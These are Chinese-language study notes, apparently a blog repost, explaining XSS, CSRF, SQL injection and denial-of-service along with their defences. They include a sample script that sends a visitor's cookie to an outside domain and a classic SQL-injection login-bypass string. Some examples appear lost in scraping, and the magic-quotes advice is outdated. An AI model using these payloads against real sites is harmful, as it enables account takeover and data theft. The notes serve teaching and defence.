攻击技术（CS-Notes）

落日映苍穹つ 2021-11-11 07:20 356阅读 0赞

**目录**

1 跨站脚本攻击

1.1 概念

1.2 攻击原理

1.3 危害

1.4 防范手段

1. 设置 Cookie 为 HttpOnly

2. 过滤特殊字符

2 跨站请求伪造

2.1 概念

2.2 攻击原理

2.3 防范手段

1. 检查 Referer 首部字段

2. 添加校验 Token

3. 输入验证码

3 SQL 注入攻击

概念

攻击原理

防范手段

1. 使用参数化查询

2. 单引号转换

4 拒绝服务攻击

参考资料

--------------------

# 1 跨站脚本攻击 #

## 1.1 概念 ##

跨站脚本攻击（Cross-Site Scripting, XSS），可以将代码注入到用户浏览的网页上，这种代码包括 HTML 和 JavaScript。

## 1.2 攻击原理 ##

例如有一个论坛网站，攻击者可以在上面发布以下内容：

之后该内容可能会被渲染成以下形式：

<p><script>location.href="//domain.com/?c=" + document.cookie</script></p>

另一个用户浏览了含有这个内容的页面 **将会跳转到 domain.com 并携带了当前作用域的 Cookie**。如果这个论坛网站通过 Cookie 管理 用户登录状态，那么攻击者就可以通过这个 Cookie 登录 被攻击者的账号了。

## 1.3 危害 ##

*  窃取用户的 Cookie
 *  伪造虚假的输入表单 骗取个人信息
 *  显示伪造的文章或者图片

## 1.4 防范手段 ##

### 1. 设置 Cookie 为 HttpOnly ###

设置了 HttpOnly 的 Cookie 可以防止 JavaScript 脚本调用，就无法通过 document.cookie 获取用户 Cookie 信息。

### 2. 过滤特殊字符 ###

例如将 **`<`**转义为`<`，将**`>`**转义为`>`，从而避免 HTML 和 Jascript 代码的运行。

富文本编辑器允许用户输入 HTML 代码，就不能简单地将 `<` 等字符进行过滤了，极大地提高了 XSS 攻击的可能性。

富文本编辑器通常采用 XSS filter 来防范 XSS 攻击，通过定义一些标签白名单或者黑名单，从而不允许有攻击性的 HTML 代码的输入。

以下例子中，**form** 和 **script** 等标签 **都被转义**，而 h 和 p 等标签将会保留。

<h1 id="title">XSS Demo</h1>
    
    <p>123</p>
    
    <form>
      <input type="text" name="q" value="test">
    </form>
    
    <pre>hello</pre>
    
    <script type="text/javascript">
    alert(/xss/);
    </script>

<h1>XSS Demo</h1>
    
    <p>123</p>
    
    <form>
      <input type="text" name="q" value="test">
    </form>
    
    <pre>hello</pre>
    
    <script type="text/javascript">
    alert(/xss/);
    </script>

> [XSS 过滤在线测试][XSS]

--------------------

# 2 跨站请求伪造 #

## 2.1 概念 ##

跨站请求伪造（Cross-site request forgery，CSRF），是攻击者通过一些技术手段 **欺骗** 用户的浏览器 **去访问** 一个自己曾经认证过的网站 **并执行一些操作**（如发邮件，发消息，甚至财产操作如转账和购买商品）。由于浏览器曾经认证过，所以被访问的网站会认为是真正的用户操作 而去执行。

XSS 利用的是用户对指定网站的信任

CSRF 利用的是网站对用户浏览器的信任。

## 2.2 攻击原理 ##

假如一家银行用以执行转账操作的 URL 地址如下：

http://www.examplebank.com/withdraw?account=AccoutName&amount=1000&for=PayeeName。

那么，一个恶意攻击者可以在另一个网站上放置如下代码：

如果有账户名为 Alice 的用户访问了恶意站点，而她之前刚访问过银行不久，登录信息尚未过期，那么她就会损失 1000 美元。

这种恶意的网址可以有很多种形式，藏身于网页中的许多地方。此外，攻击者也不需要控制放置恶意网址的网站。例如他可以将这种地址藏在论坛，博客等任何用户生成内容的网站中。这意味着如果服务器端没有合适的防御措施的话，用户即使访问熟悉的可信网站也有受攻击的危险。

通过例子能够看出，攻击者并不能通过 CSRF 攻击来直接获取用户的账户控制权，也不能直接窃取用户的任何信息。他们能做到的，是**欺骗**用户浏览器，让其以用户的名义执行操作。

## 2.3 防范手段 ##

### 1. 检查 Referer 首部字段 ###

Referer 首部字段 位于 HTTP 报文 中，用于标识 请求来源的地址。**检查**这个首部字段 **并要求**请求来源的地址**在同一个域名下**，可以极大的防止 CSRF 攻击。

这种办法简单易行，工作量低，仅需要 在关键访问处增加一步校验。但这种办法也有其局限性，因其完全依赖**浏览器发送正确的 Referer 字段**。虽然 HTTP 协议对此字段的内容有明确的规定，但并无法保证来访的浏览器的具体实现，亦无法保证浏览器没有安全漏洞影响到此字段。并且也存在攻击者 攻击某些浏览器，**篡改**其 Referer 字段的可能。

### 2. 添加校验 Token ###

在访问敏感数据请求时，要求用户浏览器 提供 不保存在 Cookie 中，并且 攻击者无法伪造的数据 作为校验。例如**服务器生成随机数**并附加在表单中，并要求客户端 传回这个随机数。

### 3. 输入验证码 ###

因为 CSRF 攻击是在用户无意识的情况下发生的，所以要求用户输入验证码，可以让用户知道自己正在做的操作。

--------------------

# 3 SQL 注入攻击 #

## 概念 ##

服务器上的数据库运行非法的 SQL 语句，主要通过拼接来完成。

## 攻击原理 ##

例如一个网站登录验证的 SQL 查询代码为：

strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');"

如果填入以下内容：

userName = "1' OR '1'='1";
    passWord = "1' OR '1'='1";

那么 SQL 查询字符串为：

strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"

此时无需验证通过就能执行以下查询：

strSQL = "SELECT * FROM users;"

## 防范手段 ##

### 1. 使用参数化查询 ###

**Java** 中的 **PreparedStatement** 是**预先编译的 SQL 语句**，可以传入适当参数 并且多次执行。由于**没有拼接的过程**，因此可以防止 SQL 注入的发生。

PreparedStatement stmt = connection.prepareStatement("SELECT * FROM users WHERE userid=? AND password=?");
    stmt.setString(1, userid);
    stmt.setString(2, password);
    ResultSet rs = stmt.executeQuery();

### 2. 单引号转换 ###

将传入的参数中的单引号 转换为 连续两个单引号，**PHP** 中的 **Magic quote** 可以完成这个功能。

--------------------

# 4 拒绝服务攻击 #

拒绝服务攻击（denial-of-service attack，DoS），亦称洪水攻击，其目的在于 使目标电脑的网络或系统资源耗尽，使服务暂时中断或停止，导致其正常用户无法访问。

分布式拒绝服务攻击（distributed denial-of-service attack，DDoS），指攻击者 使用两个或以上被攻陷的电脑 作为“僵尸” 向特定的目标 发动“拒绝服务”式攻击。（就是起几十万个访问线程，挤爆服务器。这样其他用户就无法访问了）

--------------------

# 参考资料 #

*  [维基百科：跨站脚本][Link 1]
 *  [维基百科：SQL 注入攻击][SQL]
 *  [维基百科：跨站点请求伪造][Link 2]
 *  [维基百科：拒绝服务攻击][Link 3]

[XSS]: http://jsxss.com/zh/try.html
[Link 1]: https://zh.wikipedia.org/wiki/%E8%B7%A8%E7%B6%B2%E7%AB%99%E6%8C%87%E4%BB%A4%E7%A2%BC
[SQL]: https://zh.wikipedia.org/wiki/SQL%E8%B3%87%E6%96%99%E9%9A%B1%E7%A2%BC%E6%94%BB%E6%93%8A
[Link 2]: https://zh.wikipedia.org/wiki/%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0
[Link 3]: https://zh.wikipedia.org/wiki/%E9%98%BB%E6%96%B7%E6%9C%8D%E5%8B%99%E6%94%BB%E6%93%8A